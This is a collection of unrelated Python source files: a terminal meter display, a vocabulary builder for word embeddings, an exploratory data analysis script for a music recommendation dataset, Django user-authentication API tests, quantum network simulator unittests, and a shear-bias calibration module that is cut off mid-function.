        # Clamp the live value onto the 0-100 percent scale.
        scaled_val = min(100, max(0, scaled_val))
        # Convert percent values into bar-cell positions.
        scaling_factor = 100 / METER_WIDTH
        scaled_val = int(scaled_val / scaling_factor)
        scaled_max = int(scaled_max / scaling_factor)

        lines.append(meter.name)

        cells = []
        for cell in range(METER_WIDTH):
            if cell == scaled_max and scaled_val < scaled_max:
                cells.append("|")  # max-hold marker
            elif cell <= scaled_val:
                cells.append("#")  # filled portion of the bar
            else:
                cells.append(" ")
        meter_str = f"[{''.join(cells)}] "

        # Make the meter value red if it's over the max val, e.g. a SWR too high.
        if raw_val >= meter.max_val:
            meter_str += Fore.RED
        meter_str += f"{raw_val:0.2f}"
        meter_str += Style.RESET_ALL
        if meter.unit:
            meter_str += f" {meter.unit}"
        meter_str += f" (max: {max_val:0.2f}"
        if meter.unit:
            meter_str += f" {meter.unit}"
        meter_str += ")"
        # Trailing spaces wipe leftovers when this line gets shorter than the
        # previously painted one.
        meter_str += 5 * " "
        lines.append(meter_str)

    print(Cursor.POS())  # home the cursor to (0, 0) before repainting
    for line in lines:
        print(line)
def clear_screen() -> None:
    """Clear the terminal in a platform-independent way.

    colorama does not provide a win32 clear, so shell out to `cls` there and
    emit the ANSI clear sequence everywhere else.
    """
    if sys.platform == "win32":
        os.system("cls")
        return
    print(ansi_clear_screen())
# Entry point: run the meter display loop when executed as a script.
if __name__ == "__main__":
    main()
|
'''build vocab from tokenized corpors'''
import numpy as np
from collections import defaultdict
from .. import LOGGER
class VocabBuilder:
    """Build a vocabulary (tokens, frequencies, subsampling probabilities)
    from a tokenized corpus.

    TODO:
        - save the vocab given the output vocab filename
        - prune the vocab if it does not fit max_vocab_size
    """

    def __init__(self, min_freq, subsample_rate=None):
        """
        Params:
        -------
        min_freq: minimum corpus frequency; rarer tokens are dropped.
        subsample_rate: optional subsampling threshold. Values < 1.0 are a
            proportion of the total token count (word2vec style); values
            >= 1.0 an absolute count (gensim style). None/0 disables
            subsampling.
        """
        self.min_freq = min_freq
        self.subsample_rate = subsample_rate
        self.token_to_id = dict()  # token -> integer id
        self.token_arr = list()    # id -> token, in descending frequency order
        self.freq_arr = list()     # id -> corpus frequency
        self.prob_arr = list()     # id -> keep probability for subsampling
        # BUG FIX: this attribute was misspelled `vacab_size` while
        # build_vocab() assigns `vocab_size`; use the one consistent name.
        self.vocab_size = 0
        self.min_reduce = 1

    def _prepare_token_freq_table(self, tokenized_corpus):
        """Count the corpus frequency of every token.

        Returns a defaultdict(int) mapping token -> raw count.
        """
        LOGGER.info("Build token frequency table")
        nr_tokens = 0
        token_freq_table = defaultdict(int)
        id_sentence = 0
        for sentence in tokenized_corpus:
            if id_sentence % 10000 == 0:
                LOGGER.info(
                    "PROGRESS: #%i tokenized_corpus, %i words, keeping %i word types",
                    id_sentence, nr_tokens, len(token_freq_table)
                )
            for token in sentence:
                token_freq_table[token] += 1
            nr_tokens += len(sentence)
            id_sentence += 1
            # TODO: cap the in-progress table using self.min_reduce, e.g.:
            # if self.max_vocab_size and len(token_freq_table) > self.max_vocab_size:
            #     reduce_vocab(token_table, min_reduce)
            #     min_reduce += 1
        # BUG FIX: was `id_sentence + 1 if tokenized_corpus else 0`, which
        # overcounted by one (id_sentence is already incremented once per
        # sentence) and applied truthiness to a possibly-consumed iterable.
        nr_tokenized_corpus = id_sentence
        LOGGER.info("in total %s tokens from %s tokenized_corpus", nr_tokens, nr_tokenized_corpus)
        return token_freq_table

    def _filter_on_freq(self, token_freq_table, min_freq=None):
        """Drop tokens with frequency < min_freq.

        Returns:
            (kept_vocab_size, kept_vocab) where kept_vocab maps each
            surviving token to its frequency (insertion order preserved).
        """
        if min_freq is None:
            min_freq = self.min_freq
        nr_kept_tokens, kept_vocab = 0, dict()
        for token, freq in token_freq_table.items():
            if freq >= min_freq:
                kept_vocab[token] = freq
                nr_kept_tokens += freq
        kept_vocab_size = len(kept_vocab)
        full_vocab_size = len(token_freq_table)
        # max(..., 1) guards against division by zero on an empty corpus.
        kept_vocab_pct = kept_vocab_size * 100 / max(full_vocab_size, 1)
        LOGGER.info("kept %s uniq tokens from %s all uniq tokens, or %s%% kept",
                    kept_vocab_size, full_vocab_size, round(kept_vocab_pct, 2))
        nr_total_tokens = sum(token_freq_table.values())
        kept_token_pct = nr_kept_tokens * 100 / max(nr_total_tokens, 1)
        LOGGER.info("kept %s tokens from %s tokens, or %s%% kept",
                    nr_kept_tokens, nr_total_tokens, round(kept_token_pct, 2))
        return kept_vocab_size, kept_vocab

    def _compute_subsampling_prob(self, subsample_rate=None):
        """Fill self.prob_arr with a per-token keep probability.

        Uses the word2vec subsampling formula; tokens whose computed
        probability reaches 1.0 are never downsampled.
        """
        nr_total_tokens = sum(self.freq_arr)
        nr_uniq_tokens = len(self.token_arr)
        if subsample_rate is None:
            subsample_rate = self.subsample_rate
        if not subsample_rate:
            # No subsampling: with threshold == total count every token's
            # probability computes to >= 1.0.
            threshold_count = nr_total_tokens
        elif subsample_rate < 1.0:
            # Set parameter as a proportion of the total token count
            # (compatible with the word2vec implementation).
            threshold_count = subsample_rate * nr_total_tokens
        else:
            # sample >= 1: downsample all words with higher count than sample
            # (compatible with the gensim implementation).
            threshold_count = int(subsample_rate * (3 + np.sqrt(5)) / 2)
        downsample_total, downsample_unique = 0, 0
        self.prob_arr = list()
        for token_id in range(nr_uniq_tokens):
            freq = self.freq_arr[token_id]
            token_probability = (np.sqrt(freq / threshold_count) + 1) * (threshold_count / freq)
            if token_probability < 1.0:
                downsample_unique += 1
                downsample_total += token_probability * freq
            else:
                token_probability = 1.0
                downsample_total += freq
            self.prob_arr.append(token_probability)

    def _sort_by_descending_freq(self, vocab_freq):
        """Return the tokens of `vocab_freq` sorted by descending frequency."""
        if not vocab_freq:
            return vocab_freq
        return sorted(vocab_freq, key=lambda ele: vocab_freq[ele], reverse=True)

    def build_vocab(self, corpus):
        """
        Build vocabulary from a sequence of token lists.

        Params:
        -------
        corpus: a list of token lists,
            [[token_1, token_2, ...], [token_i, token_i+1], ...]
        """
        token_freq_table = self._prepare_token_freq_table(corpus)
        self.vocab_size, vocab_table = self._filter_on_freq(token_freq_table)
        self.token_arr = self._sort_by_descending_freq(vocab_table)
        self.freq_arr = [vocab_table[token] for token in self.token_arr]
        vocab_table = None  # release the intermediate table
        # BUG FIX: was `enumerate(token_arr)` — an undefined name that raised
        # NameError; the ids must be derived from self.token_arr.
        self.token_to_id = {
            token: token_id
            for token_id, token in enumerate(self.token_arr)
        }
        # compute probabilities from frequencies
        self._compute_subsampling_prob()
        # no Hierarchical Softmax for now
        # if self.hs:
        #     # add info about each word's Huffman encoding
        #     self.create_binary_tree()
|
# eda.py
"""Exploratory Data Analysis on WSDM Dataset with visualization.
Author: DHSong
Last Modified At: 2020.07.05
Exploratory Data Analysis on WSDM Dataset with visualization.
"""
import os
import pandas as pd
import matplotlib.font_manager as fm
import matplotlib.pyplot as plt
import seaborn as sns
class EDAWorker:
    """Worker for exploratory data analysis on the WSDM KKBox dataset.

    Loads every CSV from the data directory once and exposes plotting
    helpers that save bar/KDE plots under ./figures (the directory must
    already exist).

    Attributes:
        train_raw: pandas DataFrame for the train dataset (train.csv).
        test_raw: pandas DataFrame for the test dataset (test.csv).
        sample_submission_raw: pandas DataFrame for the submission template (sample_submission.csv).
        songs_raw: pandas DataFrame for the song dataset (songs.csv).
        members_raw: pandas DataFrame for the member dataset (members.csv).
        song_extra_info_raw: pandas DataFrame for the additional song dataset (song_extra_info.csv).
    """
    def __init__(self, data_dirname='./data', font_path='./static/fonts/D2Coding.ttc'):
        """Configure matplotlib and load all CSV files from `data_dirname`."""
        self._matplotlib_setting(font_path)
        self.train_raw = pd.read_csv(os.path.join(data_dirname, 'train.csv'))
        self.test_raw = pd.read_csv(os.path.join(data_dirname, 'test.csv'))
        self.sample_submission_raw = pd.read_csv(os.path.join(data_dirname, 'sample_submission.csv'))
        self.songs_raw = pd.read_csv(os.path.join(data_dirname, 'songs.csv'))
        self.members_raw = pd.read_csv(os.path.join(data_dirname, 'members.csv'))
        self.song_extra_info_raw = pd.read_csv(os.path.join(data_dirname, 'song_extra_info.csv'))
    def _matplotlib_setting(self, font_path):
        """Set the matplotlib font family (from `font_path`) and plot style."""
        font_family = fm.FontProperties(fname=font_path).get_name()
        plt.rcParams['font.family'] = font_family
        plt.rcParams['font.size'] = 14
        plt.style.use('seaborn-darkgrid')
    def barplot_train_column_by_target(self, column, horizontal=True):
        """Save a count barplot of a train-dataset column, split by target.

        Args:
            column: which column in the train dataset to plot.
            horizontal: whether the bars are drawn horizontally.
        """
        assert column in self.train_raw.columns
        plt.figure(figsize=(16, 9))
        if horizontal:
            sns.countplot(y=column, hue='target', data=self.train_raw, order=self.train_raw[column].value_counts().index)
        else:
            sns.countplot(x=column, hue='target', data=self.train_raw, order=self.train_raw[column].value_counts().index)
        plt.title('{} Distribution by target'.format(column))
        plt.legend(loc='upper right')
        plt.savefig('./figures/barplot_train_column_by_target-{}'.format(column))
    def barplot_members_column(self, column, horizontal=True):
        """Save a count barplot of a members-dataset column.

        Args:
            column: which column in the members dataset to plot.
            horizontal: whether the bars are drawn horizontally.
        """
        assert column in self.members_raw.columns
        plt.figure(figsize=(16, 9))
        if horizontal:
            sns.countplot(y=column, data=self.members_raw, order=self.members_raw[column].value_counts().index)
        else:
            sns.countplot(x=column, data=self.members_raw, order=self.members_raw[column].value_counts().index)
        plt.title('{} Distribution'.format(column))
        plt.savefig('./figures/barplot_members_column-{}'.format(column))
    def barplot_members_column_by_target(self, column, horizontal=True):
        """Save a count barplot of a members-dataset column, split by target.

        Joins members with train on 'msno' to obtain the target value.

        Args:
            column: which column in the members dataset to plot.
            horizontal: whether the bars are drawn horizontally.
        """
        assert column in self.members_raw.columns
        members_train = pd.merge(left=self.members_raw, right=self.train_raw, how='inner', on='msno')
        plt.figure(figsize=(16, 9))
        if horizontal:
            sns.countplot(y=column, hue='target', data=members_train, order=self.members_raw[column].value_counts().index)
        else:
            sns.countplot(x=column, hue='target', data=members_train, order=self.members_raw[column].value_counts().index)
        plt.title('{} Distribution by target'.format(column))
        plt.legend(loc='upper right')
        plt.savefig('./figures/barplot_members_column_by_target-{}'.format(column))
    def kdeplot_members_column(self, column):
        """Save a KDE plot of a numeric members-dataset column.

        Args:
            column: which column in the members dataset to plot.
        """
        assert column in self.members_raw.columns
        plt.figure(figsize=(16, 9))
        sns.kdeplot(self.members_raw[column], shade=True)
        # NOTE(review): title says "by target" although this plot is not split
        # by target.
        plt.title('{} Distribution by target'.format(column))
        plt.savefig('./figures/kdeplot_members_column-{}'.format(column))
    def kdeplot_members_column_by_target(self, column):
        """Save KDE plots of a numeric members-dataset column, one per target.

        Joins members with train on 'msno' to obtain the target value.

        Args:
            column: which column in the members dataset to plot.
        """
        assert column in self.members_raw.columns
        members_train = pd.merge(left=self.members_raw, right=self.train_raw, how='inner', on='msno')
        plt.figure(figsize=(16, 9))
        sns.kdeplot(members_train.loc[members_train.target == 0, column], shade=True, label='0')
        sns.kdeplot(members_train.loc[members_train.target == 1, column], shade=True, label='1')
        plt.title('{} Distribution by target'.format(column))
        plt.legend(loc='upper right')
        plt.savefig('./figures/kdeplot_members_column_by_target-{}'.format(column))
    def barplot_songs_column(self, column, horizontal=True):
        """Save a count barplot of a songs-dataset column.

        Args:
            column: which column in the songs dataset to plot.
            horizontal: whether the bars are drawn horizontally.
        """
        assert column in self.songs_raw.columns
        plt.figure(figsize=(16, 9))
        if horizontal:
            sns.countplot(y=column, data=self.songs_raw, order=self.songs_raw[column].value_counts().index)
        else:
            sns.countplot(x=column, data=self.songs_raw, order=self.songs_raw[column].value_counts().index)
        plt.title('{} Distribution'.format(column))
        plt.savefig('./figures/barplot_songs_column-{}'.format(column))
    def barplot_songs_column_by_target(self, column, horizontal=True):
        """Save a count barplot of a songs-dataset column, split by target.

        Joins songs with train on 'song_id' to obtain the target value.

        Args:
            column: which column in the songs dataset to plot.
            horizontal: whether the bars are drawn horizontally.
        """
        assert column in self.songs_raw.columns
        songs_train = pd.merge(left=self.songs_raw, right=self.train_raw, how='inner', on='song_id')
        plt.figure(figsize=(16, 9))
        if horizontal:
            sns.countplot(y=column, hue='target', data=songs_train, order=self.songs_raw[column].value_counts().index)
        else:
            sns.countplot(x=column, hue='target', data=songs_train, order=self.songs_raw[column].value_counts().index)
        plt.title('{} Distribution by target'.format(column))
        plt.legend(loc='upper right')
        plt.savefig('./figures/barplot_songs_column_by_target-{}'.format(column))
    def kdeplot_songs_column(self, column):
        """Save a KDE plot of a numeric songs-dataset column.

        Args:
            column: which column in the songs dataset to plot.
        """
        assert column in self.songs_raw.columns
        plt.figure(figsize=(16, 9))
        sns.kdeplot(self.songs_raw[column], shade=True)
        # NOTE(review): title says "by target" although this plot is not split
        # by target.
        plt.title('{} Distribution by target'.format(column))
        plt.savefig('./figures/kdeplot_songs_column-{}'.format(column))
    def kdeplot_songs_column_by_target(self, column):
        """Save KDE plots of a numeric songs-dataset column, one per target.

        Joins songs with train on 'song_id' to obtain the target value.

        Args:
            column: which column in the songs dataset to plot.
        """
        assert column in self.songs_raw.columns
        songs_train = pd.merge(left=self.songs_raw, right=self.train_raw, how='inner', on='song_id')
        plt.figure(figsize=(16, 9))
        sns.kdeplot(songs_train.loc[songs_train.target == 0, column], shade=True, label='0')
        sns.kdeplot(songs_train.loc[songs_train.target == 1, column], shade=True, label='1')
        plt.title('{} Distribution by target'.format(column))
        plt.legend(loc='upper right')
        plt.savefig('./figures/kdeplot_songs_column_by_target-{}'.format(column))
if __name__ == '__main__':
    # Run the full EDA pass: report shapes/missing values and save all
    # figures under ./figures (the directory must already exist).
    worker = EDAWorker(data_dirname='./data', font_path='./static/fonts/D2Coding.ttc')
    print('Train Dataset Shape: {}'.format(worker.train_raw.shape))
    print('Test Dataset Shape: {}'.format(worker.test_raw.shape))
    print('\n*********Train Dataset Missing Values*********')
    print(worker.train_raw.isna().sum())
    print()
    # Categorical train columns, split by target.
    worker.barplot_train_column_by_target('source_system_tab')
    worker.barplot_train_column_by_target('source_screen_name')
    worker.barplot_train_column_by_target('source_type')
    print('\n*********Members Dataset Missing Values*********')
    print(worker.members_raw.isna().sum())
    print()
    worker.barplot_members_column_by_target('city')
    worker.barplot_members_column_by_target('gender', horizontal=False)
    worker.barplot_members_column_by_target('registered_via', horizontal=False)
    worker.barplot_members_column('registered_via', horizontal=False)
    # 'bd' (member age) is numeric, so KDE plots are used instead of barplots.
    worker.kdeplot_members_column('bd')
    worker.kdeplot_members_column_by_target('bd')
    print('\n*********Songs Dataset Missing Values*********')
    print(worker.songs_raw.isna().sum())
    print()
    worker.barplot_songs_column_by_target('language')
    worker.barplot_songs_column('language')
    worker.kdeplot_songs_column('song_length')
    worker.kdeplot_songs_column_by_target('song_length')
|
#
# Copyright 2019 Altran. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
"""
User/scf user api test cases
"""
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from ums.models import ScfUser
class UserRegistrationAPIViewTestCase(APITestCase):
    """Tests for the user registration (sign-up) endpoint."""

    url = reverse('hav-signup')

    def _valid_payload(self):
        # Every registration fixture in this suite uses the same field values,
        # so duplicate-username and duplicate-email collisions are guaranteed.
        return {
            "email": "<EMAIL>",
            "username": "<EMAIL>",
            "password": "<PASSWORD>",
            "first_name": "first_name",
            "last_name": "last_name"
        }

    def test_user_registration(self):
        """A POST with valid user data succeeds and returns an auth token."""
        response = self.client.post(self.url, self._valid_payload())
        self.assertEqual(200, response.status_code)
        self.assertTrue("token" in response.data)

    def test_unique_username_validation(self):
        """A second POST reusing an existing username is rejected."""
        first = self.client.post(self.url, self._valid_payload())
        self.assertEqual(200, first.status_code)
        second = self.client.post(self.url, self._valid_payload())
        self.assertEqual(400, second.status_code)

    def test_email_username_validation(self):
        """A second POST reusing an existing email is rejected."""
        first = self.client.post(self.url, self._valid_payload())
        self.assertEqual(200, first.status_code)
        second = self.client.post(self.url, self._valid_payload())
        self.assertEqual(400, second.status_code)
class UserLoginAPIViewTestCase(APITestCase):
    """User login API test cases."""

    url = reverse("hav-login")

    def setUp(self):
        """Create the user every login test authenticates against."""
        self.username = "ranvijay"
        self.email = "<EMAIL>"
        self.password = "<PASSWORD>"
        self.user = ScfUser.objects.create_user(self.email, self.password)

    def test_authentication_without_password(self):
        """A login request missing the password is rejected with 400."""
        resp = self.client.post(self.url, {"email": "<EMAIL>"})
        self.assertEqual(400, resp.status_code)

    def test_authentication_with_wrong_password(self):
        """A login request with a bad password is rejected with 401."""
        payload = {"email": self.email, "password": "<PASSWORD>"}
        resp = self.client.post(self.url, payload)
        self.assertEqual(401, resp.status_code)

    def test_authentication_with_valid_data(self):
        """A valid login succeeds and returns an auth token."""
        payload = {"email": self.email, "password": self.password}
        resp = self.client.post(self.url, payload)
        self.assertEqual(200, resp.status_code)
        self.assertTrue("token" in resp.data)
class UserLogoutAPIViewTestCase(APITestCase):
    """User logout API test cases."""

    url = reverse("hav-logout")

    def setUp(self):
        """Create a user, obtain a token, and authenticate the client."""
        self.username = "logout_test"
        self.email = "<EMAIL>"
        self.password = "<PASSWORD>"
        self.user = ScfUser.objects.create_user(self.email, self.password)
        # get_or_create returns a (token, created) tuple; keep it whole so
        # the helpers below index [0] for the Token instance.
        self.token = Token.objects.get_or_create(user=self.user)
        self.api_authentication()

    def api_authentication(self):
        """Attach the token to the test client session."""
        key = self.token[0].key
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + key)

    def test_logout(self):
        """Logging out succeeds and deletes the auth token."""
        resp = self.client.get(self.url)
        self.assertEqual(200, resp.status_code)
        self.assertFalse(Token.objects.filter(key=self.token[0].key).exists())
|
# Repository: Phionx/quantumnetworks
"""
Unittests
Run using:
python -m unittest tests/test_multimode.py
"""
import os
import sys
import unittest
sys.path.insert(0, ".." + os.sep)
from quantumnetworks import SingleModeSystem, DoubleModeSystem, MultiModeSystem
from scipy.integrate import odeint
import numpy as np
class MultiModeTest(unittest.TestCase):
    """Tests for MultiModeSystem: integrator accuracy against scipy's odeint,
    Jacobian consistency, and agreement with the dedicated single- and
    double-mode implementations."""

    @staticmethod
    def _two_mode_system():
        """Build the canonical coupled two-mode system used by most tests."""
        return MultiModeSystem(
            params={
                "omegas": [2 * np.pi * 1, 2 * np.pi * 2],
                "kappas": [2 * np.pi * 0.001, 2 * np.pi * 0.005],
                "gammas": [2 * np.pi * 0.002, 2 * np.pi * 0.002],
                "kerrs": [2 * np.pi * 0.01, 2 * np.pi * 0.01],
                "couplings": [[0, 1, 2 * np.pi * 0.002]],
            }
        )

    @staticmethod
    def _odeint_solution(system, x_0, ts):
        """Reference trajectory computed with scipy.integrate.odeint."""
        func = lambda y, t: system.eval_f(y, system.eval_u(t))
        return odeint(func, x_0, ts)

    def test_forward_euler_default_A_in(self):
        """
        Compare forward euler evolution of a coupled two mode system
        with default (no) drive against scipy's odeint solver.
        """
        system = self._two_mode_system()
        x_0 = np.array([1, 0, 0, 1])
        ts = np.linspace(0, 1, 100001)
        X = system.forward_euler(x_0, ts)
        sol = self._odeint_solution(system, x_0, ts)
        self.assertTrue(np.allclose(X.T, sol, atol=0.002))

    def test_trapezoidal_default_A_in(self):
        """
        Compare trapezoidal evolution of a coupled two mode system
        with default (no) drive against scipy's odeint solver.
        """
        system = self._two_mode_system()
        x_0 = np.array([1, 0, 0, 1])
        ts = np.linspace(0, 1, 1001)
        X = system.trapezoidal(x_0, ts)
        sol = self._odeint_solution(system, x_0, ts)
        self.assertTrue(np.allclose(X.T, sol, atol=0.0005))

    def test_trapezoidal_dynamic_default_A_in(self):
        """
        Compare dynamic dt trapezoidal evolution of a coupled two mode system
        with default (no) drive against scipy's odeint solver.
        """
        system = self._two_mode_system()
        x_0 = np.array([1, 0, 0, 1])
        ts = np.linspace(0, 1, 1001)
        # dynamic_dt lets the integrator adapt the step; it returns the
        # (possibly refined) time grid alongside the trajectory.
        X, ts = system.trapezoidal(x_0, ts, dynamic_dt=True)
        sol = self._odeint_solution(system, x_0, ts)
        self.assertTrue(np.allclose(X.T, sol, atol=0.005))

    def test_analytic_vs_numerical_Jf(self):
        """
        Compare analytic vs numerical Jacobian.
        """
        system = self._two_mode_system()
        x_0 = np.array([1, 0, 0, 1])
        u = system.eval_u(0)
        Jf_analytic = system.eval_Jf(x_0, u)
        Jf_numeric = system.eval_Jf_numerical(x_0, u)
        self.assertTrue(np.allclose(Jf_analytic, Jf_numeric))

    def test_against_double_mode(self):
        """
        The multi-mode system with two modes must produce the same A and B
        matrices as the dedicated double-mode implementation.
        """
        system = self._two_mode_system()
        A_in = lambda t: 0
        B_in = lambda t: 0
        system_double = DoubleModeSystem(
            params={
                "omega_a": 2 * np.pi * 1,
                "omega_b": 2 * np.pi * 2,
                "kappa_a": 2 * np.pi * 0.001,
                "kappa_b": 2 * np.pi * 0.005,
                "kerr_a": 2 * np.pi * 0.01,
                "kerr_b": 2 * np.pi * 0.01,
                "gamma_a": 2 * np.pi * 0.002,
                "gamma_b": 2 * np.pi * 0.002,
                "g_ab": 2 * np.pi * 0.002,
            },
            A_in=A_in,
            B_in=B_in,
        )
        self.assertTrue(np.array_equal(system.A, system_double.A))
        self.assertTrue(np.array_equal(system.B, system_double.B))

    def test_against_single_mode(self):
        """
        The multi-mode system with one mode (no couplings) must produce the
        same A and B matrices as the dedicated single-mode implementation.
        """
        system = MultiModeSystem(
            params={
                "omegas": [2 * np.pi * 1],
                "kappas": [2 * np.pi * 0.001],
                "gammas": [2 * np.pi * 0.002],
                "kerrs": [2 * np.pi * 0.01],
                "couplings": [],
            }
        )
        A_in = lambda t: 0
        # was misleadingly named `system_double` in the original
        system_single = SingleModeSystem(
            params={
                "omega_a": 2 * np.pi * 1,
                "kappa_a": 2 * np.pi * 0.001,
                "gamma_a": 2 * np.pi * 0.002,
                "kerr_a": 2 * np.pi * 0.01,
            },
            A_in=A_in,
        )
        self.assertTrue(np.array_equal(system.A, system_single.A))
        self.assertTrue(np.array_equal(system.B, system_single.B))

    def test_linearization(self):
        """
        Compare forward euler evolution of linearized system dynamics of a
        coupled three mode system against the full nonlinear dynamics
        (at early times, where the linearization should hold to ~1%).
        """
        sys = MultiModeSystem(
            params={
                "omegas": [2 * np.pi * 1, 2 * np.pi * 2, 2 * np.pi * 1],
                "kappas": [2 * np.pi * 0.001, 2 * np.pi * 0.005, 2 * np.pi * 0.001],
                "gammas": [2 * np.pi * 0.002, 2 * np.pi * 0.002, 2 * np.pi * 0.002],
                "kerrs": [2 * np.pi * 0.001, 2 * np.pi * 0.001, 2 * np.pi * 0.001],
                "couplings": [[0, 1, 2 * np.pi * 0.002], [1, 2, 2 * np.pi * 0.002]],
            }
        )
        x_0 = np.array([1, 0, 0, 1, 1, 0])
        n = 100000
        ts = np.linspace(0, 1, n + 1)
        X = sys.forward_euler(x_0, ts)
        X_linear = sys.forward_euler_linear(x_0, ts, x_0, 0)
        # take beginning of sequences
        X_linear_i = X_linear[:, : n // 10]
        X_i = X[:, : n // 10]
        # filter to prevent divide by 0 errors
        X_linear_i = X_linear_i[X_i != 0]
        X_i = X_i[X_i != 0]
        max_perc_diff = np.max(np.abs((X_i - X_linear_i) / X_i))
        self.assertTrue(max_perc_diff < 0.01)  # within 1%
#%%
# Script entry point: run the whole test suite when executed directly.
if __name__ == "__main__":
    unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 24 13:24:43 2020
@author: ssli
Module to calculate the m bias
mcFitFunc:
Shear bias function.
WgQuantile1DFunc:
Calculate the weighted quantile by given probabilities
designed for 1D numpy array.
WgBin2DFunc:
Calculate the weighted quantile by given bin numbers
designed for 2D numpy array
mCalFunc:
Calculating the residual shear bias (m-value) in 2-d bins
"""
import numpy as np
from scipy import optimize
import pandas as pd
from astropy.io import fits
## All possible g1,g2 combinations
# Input shear values used by the simulations: four axis-aligned combinations
# (|g| = 0.04) and four diagonal ones (|g1| = |g2| = 0.0283). Element kk of
# g1Range pairs with element kk of g2Range.
g1Range = np.array([-0.04,0.00,0.04,0.00,-0.0283,+0.0283,+0.0283,-0.0283])
g2Range = np.array([0.00,0.04,0.00,-0.04,+0.0283,+0.0283,-0.0283,-0.0283])
def mcFitFunc(x, m, c):
    """Linear shear-bias model: g_out = (1 + m) * g_in + c."""
    slope = 1. + m
    return slope * x + c
def WgQuantile1DFunc(values, weights, pq):
    """
    Weighted quantiles of a 1D array at probabilities `pq`.

    Uses the standard weighted-percentile construction: sort by value,
    place each sample at the midpoint of its cumulative-weight interval,
    then linearly interpolate.
    """
    order = np.argsort(values)
    vals = values[order]
    wgts = weights[order]
    # Midpoint cumulative probabilities of the sorted, weighted samples.
    cum = np.cumsum(wgts)
    probs = (cum - 0.5 * wgts) / np.sum(wgts)
    return np.interp(pq, probs, vals)
def WgBin2DFunc(v1, v2, wgs, Nbin1, Nbin2):
    """
    Weighted 2D binning: equal-weight bin edges in v1, then equal-weight
    edges in v2 within each v1 bin.

    Returns (q1, q2s) where q1 has Nbin1+1 edges and q2s is an
    (Nbin1, Nbin2+1) array of v2 edges, one row per v1 bin.
    """
    # Probabilities corresponding to equal-weight bins.
    pq1 = np.linspace(0, 1.0, Nbin1 + 1)
    pq2 = np.linspace(0, 1.0, Nbin2 + 1)

    # Outer edges along v1.
    q1 = WgQuantile1DFunc(v1, wgs, pq1)

    # Inner edges along v2, computed per half-open v1 bin [lo, hi).
    q2s = []
    for lo, hi in zip(q1[:-1], q1[1:]):
        sel = (v1 >= lo) & (v1 < hi)
        q2s.append(WgQuantile1DFunc(v2[sel], wgs[sel], pq2))
    return q1, np.array(q2s)
def mCalFunc(id_bin, dataSim, dataReal,
            Nbin1, Nbin2, pq):
    """
    Calculating the residual shear bias in 2-d bins.

    Bins the simulation catalogue in (SNR, resolution R) with equal-weight
    bins, fits the linear bias model g_out = (1+m) g_in + c per bin for both
    shear components, bootstraps the fit errors, and combines the per-bin
    m-values into weighted averages using the data weights per bin.

    Parameters:
        id_bin   -- identifier of this bin, passed through to the result.
        dataSim  -- simulation catalogue (pandas DataFrame) with columns
                    snr_model, g1, g2, e1, e2, size_out, psf_size_in, LFweight.
        dataReal -- data catalogue (pandas DataFrame) with columns
                    model_SNratio, PSF_Q11/Q22/Q12, bias_corrected_e1/e2,
                    bias_corrected_scalelength_pixels, recal_weight.
        Nbin1, Nbin2 -- number of bins in SNR and in R.
        pq       -- queue-like object; the result dict is put() on it
                    (presumably a multiprocessing.Queue — confirm in caller).
    """
    # helper quantities
    # Simulation
    snrSim = dataSim['snr_model'].values
    #
    g1_inSim = dataSim['g1'].values
    g2_inSim = dataSim['g2'].values
    #
    e1Sim = dataSim['e1'].values
    e2Sim = dataSim['e2'].values
    eSim = np.sqrt(e1Sim**2 + e2Sim**2)
    #
    # circularised galaxy size from the measured size and |e|
    size_out_altSim = dataSim['size_out'].values*np.sqrt((1.-eSim)/(1.+eSim))
    #
    # galaxy 'resolution' R: PSF size relative to (galaxy size^2 + PSF size)
    RSim = dataSim['psf_size_in'].values/(size_out_altSim**2+dataSim['psf_size_in'].values)
    #
    wgSim= dataSim['LFweight'].values
    #
    # Data
    snrReal = dataReal['model_SNratio'].values
    #Define PSF size
    size_psfReal = np.sqrt(dataReal['PSF_Q11'].values*dataReal['PSF_Q22'].values - dataReal['PSF_Q12'].values**2)
    #Define |e| for the 3 blindings
    eReal = np.sqrt(dataReal['bias_corrected_e1'].values**2 + dataReal['bias_corrected_e2'].values**2)
    #Define circularised galaxy size
    size_abReal = dataReal['bias_corrected_scalelength_pixels'].values*np.sqrt((1.-eReal)/(1.+eReal))
    #Define galaxy 'resolution'
    RReal = size_psfReal/(size_abReal**2+size_psfReal)
    # weight
    wgReal = dataReal['recal_weight'].values
    # 2D binning
    #Calculate the bins such that each bin contains the same number of points.
    bin1_bounds, bin2_bounds = WgBin2DFunc(snrSim, RSim, wgSim, Nbin1, Nbin2)
    # Per-(SNR, R)-bin accumulators.
    wgRealSums = []
    wgReal2Sums = []  # NOTE(review): never appended to below; appears unused — confirm.
    m1s = []
    m2s = []
    m1_errs = []
    m2_errs = []
    m1_err_BSs = []
    m2_err_BSs = []
    m_err_BSs = []
    for i in range(Nbin1):
        lower1 = bin1_bounds[i]
        upper1 = bin1_bounds[i+1]
        #
        mask1Sim = (snrSim>=lower1)&(snrSim<upper1)
        mask1Real = (snrReal>=lower1)&(snrReal<upper1)
        for j in range(Nbin2):
            lower2 = bin2_bounds[i][j]
            upper2 = bin2_bounds[i][j+1]
            #
            mask2Sim = (RSim>=lower2)&(RSim<upper2)
            mask2Real = (RReal>=lower2)&(RReal<upper2)
            #
            maskSim = mask1Sim & mask2Sim
            maskReal = mask1Real & mask2Real
            # mask input parameters
            # Simulation
            wgSim_mask = wgSim[maskSim]
            #
            e1Sim_mask = e1Sim[maskSim]
            e2Sim_mask = e2Sim[maskSim]
            #
            g1_inSim_mask = g1_inSim[maskSim]
            g2_inSim_mask = g2_inSim[maskSim]
            # data
            wgReal_mask = wgReal[maskReal]
            # Data weight in this bin; used later to weight the bin's m-value.
            wgRealSums.append(np.sum(wgReal_mask))
            # prepare shear parameters for mc fitting:
            # one weighted-mean (g_in, g_out) point per input shear combination
            g1_out=[]
            g2_out=[]
            g_out_w=[]
            g1_in_used=[]
